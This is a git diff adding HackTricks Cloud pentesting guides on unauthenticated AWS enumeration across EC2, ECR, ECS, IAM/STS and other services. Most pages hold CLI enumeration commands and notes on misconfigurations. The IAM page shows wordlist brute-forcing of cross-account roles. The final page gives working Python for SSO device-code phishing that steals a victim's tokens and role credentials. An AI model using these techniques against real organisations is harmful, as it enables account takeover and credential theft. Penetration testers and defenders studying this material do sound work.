+{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-dynamodb-unauthenticated-access.md b/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-dynamodb-unauthenticated-access.md new file mode 100644 index 0000000000..8067c97b0b --- /dev/null +++ b/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-dynamodb-unauthenticated-access.md @@ -0,0 +1,41 @@ +# AWS - DynamoDB Unauthenticated Access + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} + +## Dynamo DB + +For more information check: + +{% content-ref url="../aws-services/aws-dynamodb-enum.md" %} +[aws-dynamodb-enum.md](../aws-services/aws-dynamodb-enum.md) +{% endcontent-ref %} + +Apart from giving access to all AWS or some compromised external AWS account, or have some SQL injections in an application that communicates with DynamoDB I'm don't know more options to access AWS accounts from DynamoDB. + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-ec2-unauthenticated-enum.md b/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-ec2-unauthenticated-enum.md new file mode 100644 index 0000000000..ea692e888e --- /dev/null +++ b/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-ec2-unauthenticated-enum.md @@ -0,0 +1,88 @@ +# AWS - EC2 Unauthenticated Enum + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} + +## EC2 & Related Services + +Check in this page more information about this: + +{% content-ref url="../aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/" %} +[aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum](../aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/) +{% endcontent-ref %} + +### Public Ports + +It's possible to expose the **any port of the virtual machines to the internet**. Depending on **what is running** in the exposed the port an attacker could abuse it. + +#### SSRF + +{% embed url="https://book.hacktricks.xyz/pentesting-web/ssrf-server-side-request-forgery/cloud-ssrf" %} + +### Public AMIs & EBS Snapshots + +AWS allows to **give access to anyone to download AMIs and Snapshots**. You can list these resources very easily from your own account: + +{% code overflow="wrap" %} +```bash +# Public AMIs +aws ec2 describe-images --executable-users all + +## Search AMI by ownerID +aws ec2 describe-images --executable-users all --query 'Images[?contains(ImageLocation, `967541184254/`) == `true`]' + +## Search AMI by substr ("shared" in the example) +aws ec2 describe-images --executable-users all --query 'Images[?contains(ImageLocation, `shared`) == `true`]' + +# Public EBS snapshots (hard-drive copies) +aws ec2 describe-snapshots --restorable-by-user-ids all +aws ec2 describe-snapshots --restorable-by-user-ids all | jq '.Snapshots[] | select(.OwnerId == "099720109477")' +``` +{% endcode %} + +If you find a snapshot that is restorable by anyone, make sure to check [AWS - EBS Snapshot Dump](https://cloud.hacktricks.xyz/pentesting-cloud/aws-security/aws-post-exploitation/aws-ec2-ebs-ssm-and-vpc-post-exploitation/aws-ebs-snapshot-dump) for directions on downloading and looting the snapshot. 
+ +#### Public URL template + +```bash +# EC2 +ec2-{ip-seperated}.compute-1.amazonaws.com +# ELB +http://{user_provided}-{random_id}.{region}.elb.amazonaws.com:80/443 +https://{user_provided}-{random_id}.{region}.elb.amazonaws.com +``` + +### Enumerate EC2 instances with public IP + +{% code overflow="wrap" %} +```bash +aws ec2 describe-instances --query "Reservations[].Instances[?PublicIpAddress!=null].PublicIpAddress" --output text +``` +{% endcode %} + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-ecr-unauthenticated-enum.md b/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-ecr-unauthenticated-enum.md new file mode 100644 index 0000000000..0e491c74e3 --- /dev/null +++ b/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-ecr-unauthenticated-enum.md @@ -0,0 +1,63 @@ +# AWS - ECR Unauthenticated Enum + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} + +## ECR + +For more information check: + +{% content-ref url="../aws-services/aws-ecr-enum.md" %} +[aws-ecr-enum.md](../aws-services/aws-ecr-enum.md) +{% endcontent-ref %} + +### Public registry repositories (images) + +As mentioned in the ECS Enum section, a public registry is **accessible by anyone** uses the format **`public.ecr.aws//`**. If a public repository URL is located by an attacker he could **download the image and search for sensitive information** in the metadata and content of the image. + +{% code overflow="wrap" %} +```bash +aws ecr describe-repositories --query 'repositories[?repositoryUriPublic == `true`].repositoryName' --output text +``` +{% endcode %} + +{% hint style="warning" %} +This could also happen in **private registries** where a registry policy or a repository policy is **granting access for example to `"AWS": "*"`**. Anyone with an AWS account could access that repo. +{% endhint %} + +### Enumerate Private Repo + +The tools [**skopeo**](https://github.com/containers/skopeo) and [**crane**](https://github.com/google/go-containerregistry/blob/main/cmd/crane/doc/crane.md) can be used to list accessible repositories inside a private registry. + +```bash +# Get image names +skopeo list-tags docker:// | grep -oP '(?<=^Name: ).+' +crane ls | sed 's/ .*//' +``` + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-ecs-unauthenticated-enum.md b/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-ecs-unauthenticated-enum.md new file mode 100644 index 0000000000..1f9e1b97bd --- /dev/null +++ b/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-ecs-unauthenticated-enum.md @@ -0,0 +1,53 @@ +# AWS - ECS Unauthenticated Enum + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} + +## ECS + +For more information check: + +{% content-ref url="../aws-services/aws-ecs-enum.md" %} +[aws-ecs-enum.md](../aws-services/aws-ecs-enum.md) +{% endcontent-ref %} + +### Publicly Accessible Security Group or Load Balancer for ECS Services + +A misconfigured security group that **allows inbound traffic from the internet (0.0.0.0/0 or ::/0)** to the Amazon ECS services could expose the AWS resources to attacks. + +{% code overflow="wrap" %} +```bash +# Example of detecting misconfigured security group for ECS services +aws ec2 describe-security-groups --query 'SecurityGroups[?IpPermissions[?contains(IpRanges[].CidrIp, `0.0.0.0/0`) || contains(Ipv6Ranges[].CidrIpv6, `::/0`)]]' + +# Example of detecting a publicly accessible load balancer for ECS services +aws elbv2 describe-load-balancers --query 'LoadBalancers[?Scheme == `internet-facing`]' +``` +{% endcode %} + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-elastic-beanstalk-unauthenticated-enum.md b/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-elastic-beanstalk-unauthenticated-enum.md new file mode 100644 index 0000000000..8ea519bad6 --- /dev/null +++ b/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-elastic-beanstalk-unauthenticated-enum.md @@ -0,0 +1,65 @@ +# AWS - Elastic Beanstalk Unauthenticated Enum + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} + +## Elastic Beanstalk + +For more information check: + +{% content-ref url="../aws-services/aws-elastic-beanstalk-enum.md" %} +[aws-elastic-beanstalk-enum.md](../aws-services/aws-elastic-beanstalk-enum.md) +{% endcontent-ref %} + +### Web vulnerability + +Note that by default Beanstalk environments have the **Metadatav1 disabled**. + +The format of the Beanstalk web pages is **`https://-env..elasticbeanstalk.com/`** + +### Insecure Security Group Rules + +Misconfigured security group rules can expose Elastic Beanstalk instances to the public. **Overly permissive ingress rules, such as allowing traffic from any IP address (0.0.0.0/0) on sensitive ports, can enable attackers to access the instance**. + +### Publicly Accessible Load Balancer + +If an Elastic Beanstalk environment uses a load balancer and the load balancer is configured to be publicly accessible, attackers can **send requests directly to the load balancer**. While this might not be an issue for web applications intended to be publicly accessible, it could be a problem for private applications or environments. + +### Publicly Accessible S3 Buckets + +Elastic Beanstalk applications are often stored in S3 buckets before deployment. If the S3 bucket containing the application is publicly accessible, an attacker could **download the application code and search for vulnerabilities or sensitive information**. 
+ +### Enumerate Public Environments + +{% code overflow="wrap" %} +```bash +aws elasticbeanstalk describe-environments --query 'Environments[?OptionSettings[?OptionName==`aws:elbv2:listener:80:defaultProcess` && contains(OptionValue, `redirect`)]].{EnvironmentName:EnvironmentName, ApplicationName:ApplicationName, Status:Status}' --output table +``` +{% endcode %} + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-elasticsearch-unauthenticated-enum.md b/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-elasticsearch-unauthenticated-enum.md new file mode 100644 index 0000000000..0e6f5efc93 --- /dev/null +++ b/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-elasticsearch-unauthenticated-enum.md @@ -0,0 +1,38 @@ +# AWS - Elasticsearch Unauthenticated Enum + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} + +### Public URL template + +``` +https://vpc-{user_provided}-[random].[region].es.amazonaws.com +https://search-{user_provided}-[random].[region].es.amazonaws.com +``` + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-iam-and-sts-unauthenticated-enum.md b/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-iam-and-sts-unauthenticated-enum.md new file mode 100644 index 0000000000..04863b2856 --- /dev/null +++ b/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-iam-and-sts-unauthenticated-enum.md @@ -0,0 +1,205 @@ +# AWS - IAM & STS Unauthenticated Enum + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} + +## Enumerate Roles & Usernames in an account + +### ~~Assume Role Brute-Force~~ + +{% hint style="danger" %} +**This technique doesn't work** anymore as if the role exists or not you always get this error: + +`An error occurred (AccessDenied) when calling the AssumeRole operation: User: arn:aws:iam::947247140022:user/testenv is not authorized to perform: sts:AssumeRole on resource: arn:aws:iam::429217632764:role/account-balanceasdas` + +You can **test this running**: + +`aws sts assume-role --role-arn arn:aws:iam::412345678909:role/superadmin --role-session-name s3-access-example` +{% endhint %} + +Attempting to **assume a role without the necessary permissions** triggers an AWS error message. For instance, if unauthorized, AWS might return: + +```ruby +An error occurred (AccessDenied) when calling the AssumeRole operation: User: arn:aws:iam::012345678901:user/MyUser is not authorized to perform: sts:AssumeRole on resource: arn:aws:iam::111111111111:role/aws-service-role/rds.amazonaws.com/AWSServiceRoleForRDS +``` + +This message confirms the role's existence but indicates that its assume role policy does not permit your assumption. In contrast, trying to **assume a non-existent role leads to a different error**: + +```less +An error occurred (AccessDenied) when calling the AssumeRole operation: Not authorized to perform sts:AssumeRole +``` + +Interestingly, this method of **discerning between existing and non-existing roles** is applicable even across different AWS accounts. With a valid AWS account ID and a targeted wordlist, one can enumerate the roles present in the account without facing any inherent limitations. + +You can use this [script to enumerate potential principals](https://github.com/RhinoSecurityLabs/Security-Research/tree/master/tools/aws-pentest-tools/assume_role_enum) abusing this issue. 
+ +### Trust Policies: Brute-Force Cross Account roles and users + +Configuring or updating an **IAM role's trust policy involves defining which AWS resources or services are permitted to assume that role** and obtain temporary credentials. If the specified resource in the policy **exists**, the trust policy saves **successfully**. However, if the resource **does not exist**, an **error is generated**, indicating that an invalid principal was provided. + +{% hint style="warning" %} +Note that in that resource you could specify a cross account role or user: + +* `arn:aws:iam::acc_id:role/role_name` +* `arn:aws:iam::acc_id:user/user_name` +{% endhint %} + +This is a policy example: + +```json +{ + "Version":"2012-10-17", + "Statement":[ + { + "Effect":"Allow", + "Principal": + { + "AWS":"arn:aws:iam::216825089941:role\/Test" + }, + "Action":"sts:AssumeRole" + } + ] +} +``` + +#### GUI + +That is the **error** you will find if you uses a **role that doesn't exist**. If the role **exist**, the policy will be **saved** without any errors. 
(The error is for update, but it also works when creating) + +![](<../../../.gitbook/assets/image (153).png>) + +#### CLI + +```bash +### You could also use: aws iam update-assume-role-policy +# When it works +aws iam create-role --role-name Test-Role --assume-role-policy-document file://a.json +{ + "Role": { + "Path": "/", + "RoleName": "Test-Role", + "RoleId": "AROA5ZDCUJS3DVEIYOB73", + "Arn": "arn:aws:iam::947247140022:role/Test-Role", + "CreateDate": "2022-05-03T20:50:04Z", + "AssumeRolePolicyDocument": { + "Version": "2012-10-17", + "Statement": [ + { + "Effect": "Allow", + "Principal": { + "AWS": "arn:aws:iam::316584767888:role/account-balance" + }, + "Action": [ + "sts:AssumeRole" + ] + } + ] + } + } +} + +# When it doesn't work +aws iam create-role --role-name Test-Role2 --assume-role-policy-document file://a.json +An error occurred (MalformedPolicyDocument) when calling the CreateRole operation: Invalid principal in policy: "AWS":"arn:aws:iam::316584767888:role/account-balanceefd23f2" +``` + +You can automate this process with [https://github.com/carlospolop/aws\_tools](https://github.com/carlospolop/aws_tools) + +* `bash unauth_iam.sh -t user -i 316584767888 -r TestRole -w ./unauth_wordlist.txt` + +Our using [Pacu](https://github.com/RhinoSecurityLabs/pacu): + +* `run iam__enum_users --role-name admin --account-id 229736458923 --word-list /tmp/names.txt` +* `run iam__enum_roles --role-name admin --account-id 229736458923 --word-list /tmp/names.txt` +* The `admin` role used in the example is a **role in your account to by impersonated** by pacu to create the policies it needs to create for the enumeration + +### Privesc + +In the case the role was bad configured an allows anyone to assume it: + +```json +{ + "Version": "2012-10-17", + "Statement": [ + { + "Effect": "Allow", + "Principal": { + "AWS": "*" + }, + "Action": "sts:AssumeRole" + } + ] +} +``` + +The attacker could just assume it. 
+ +## Third Party OIDC Federation + +Imagine that you manage to read a **Github Actions workflow** that is accessing a **role** inside **AWS**.\ +This trust might give access to a role with the following **trust policy**: + +```json +{ + "Version": "2012-10-17", + "Statement": [ + { + "Effect": "Allow", + "Principal": { + "Federated": "arn:aws:iam:::oidc-provider/token.actions.githubusercontent.com" + }, + "Action": "sts:AssumeRoleWithWebIdentity", + "Condition": { + "StringEquals": { + "token.actions.githubusercontent.com:aud": "sts.amazonaws.com" + } + } + } + ] +} +``` + +This trust policy might be correct, but the **lack of more conditions** should make you distrust it.\ +This is because the previous role can be assumed by **ANYONE from Github Actions**! You should specify in the conditions also other things such as org name, repo name, env, brach... + +Another potential misconfiguration is to **add a condition** like the following: + +```json +"StringLike": { + "token.actions.githubusercontent.com:sub": "repo:org_name*:*" +} +``` + +Note that **wildcard** (\*) before the **colon** (:). You can create an org such as **org\_name1** and **assume the role** from a Github Action. + +## References + +* [https://www.youtube.com/watch?v=8ZXRw4Ry3mQ](https://www.youtube.com/watch?v=8ZXRw4Ry3mQ) +* [https://rhinosecuritylabs.com/aws/assume-worst-aws-assume-role-enumeration/](https://rhinosecuritylabs.com/aws/assume-worst-aws-assume-role-enumeration/) + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-identity-center-and-sso-unauthenticated-enum.md b/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-identity-center-and-sso-unauthenticated-enum.md new file mode 100644 index 0000000000..fc17e635bd --- /dev/null +++ b/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-identity-center-and-sso-unauthenticated-enum.md @@ -0,0 +1,157 @@ +# AWS - Identity Center & SSO Unauthenticated Enum + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} + +## AWS Device Code Phishing + +Initially proposed in [**this blog post**](https://blog.christophetd.fr/phishing-for-aws-credentials-via-aws-sso-device-code-authentication/), it's possible to send a **link** to a user using AWS SSO that if the **user accepts** the attacker will be able to get a **token to impersonate the user** and access all the roles the user is able to access in the **Identity Center**. + +In order to perform this attack the requisites are: + +* The victim needs to use **Identity Center** +* The attacker must know the **subdomain** used by the victim `.awsapps.com/start` + +Just with the previous info, the **attacker will be able to send a link to the user** that if **accepted** will grant the **attacker access over the AWS user** account. + +### Attack + +1. **Finding the subdomain** + +The first step of the attacker is to find out the subdomain the victim company is using in their Identity Center. This can be done via **OSINT** or **guessing + BF** as most companies will be using their name or a variation of their name here. + +With this info, it's possible to get the region where the Indentity Center was configured with: + +```bash +curl https://victim.awsapps.com/start/ -s | grep -Eo '"region":"[a-z0-9\-]+"' +"region":"us-east-1 +``` + +2. 
**Generate the link for the victim & Send it** + +Run the following code to generate an AWS SSO login link so the victim can authenticate.\ +For the demo, run this code in a python console and do not exit it as later you will need some objects to get the token: + +```python +import boto3 + +REGION = 'us-east-1' # CHANGE THIS +AWS_SSO_START_URL = 'https://victim.awsapps.com/start' # CHANGE THIS + +sso_oidc = boto3.client('sso-oidc', region_name=REGION) +client = sso_oidc.register_client( + clientName = 'attacker', + clientType = 'public' +) + +client_id = client.get('clientId') +client_secret = client.get('clientSecret') +authz = sso_oidc.start_device_authorization( + clientId=client_id, + clientSecret=client_secret, + startUrl=AWS_SSO_START_URL +) + +url = authz.get('verificationUriComplete') +deviceCode = authz.get('deviceCode') +print("Give this URL to the victim: " + url) +``` + +Send the generated link to the victim using you awesome social engineering skills! + +3. **Wait until the victim accepts it** + +If the victim was **already logged in AWS** he will just need to accept granting the permissions, if he wasn't, he will need to **login and then accept granting the permissions**.\ +This is how the promp looks nowadays: + +
+ +4. **Get SSO access token** + +If the victim accepted the prompt, run this code to **generate a SSO token impersonating the user**: + +```python +token_response = sso_oidc.create_token( + clientId=client_id, + clientSecret=client_secret, + grantType="urn:ietf:params:oauth:grant-type:device_code", + deviceCode=deviceCode +) +sso_token = token_response.get('accessToken') +``` + +The SSO access token is **valid for 8h**. + +5. **Impersonate the user** + +```python +sso_client = boto3.client('sso', region_name=REGION) + +# List accounts where the user has access +aws_accounts_response = sso_client.list_accounts( + accessToken=sso_token, + maxResults=100 +) +aws_accounts_response.get('accountList', []) + +# Get roles inside an account +roles_response = sso_client.list_account_roles( + accessToken=sso_token, + accountId= +) +roles_response.get('roleList', []) + +# Get credentials over a role + +sts_creds = sso_client.get_role_credentials( + accessToken=sso_token, + roleName=, + accountId= +) +sts_creds.get('roleCredentials') +``` + +### Phishing the unphisable MFA + +It's fun to know that the previous attack **works even if an "unphisable MFA" (webAuth) is being used**. This is because the previous **workflow never leaves the used OAuth domain**. Not like in other phishing attacks where the user needs to supplant the login domain, in the case the device code workflow is prepared so a **code is known by a device** and the user can login even in a different machine. If accepted the prompt, the device, just by **knowing the initial code**, is going to be able to **retrieve credentials** for the user. + +For more info about this [**check this post**](https://mjg59.dreamwidth.org/62175.html). 
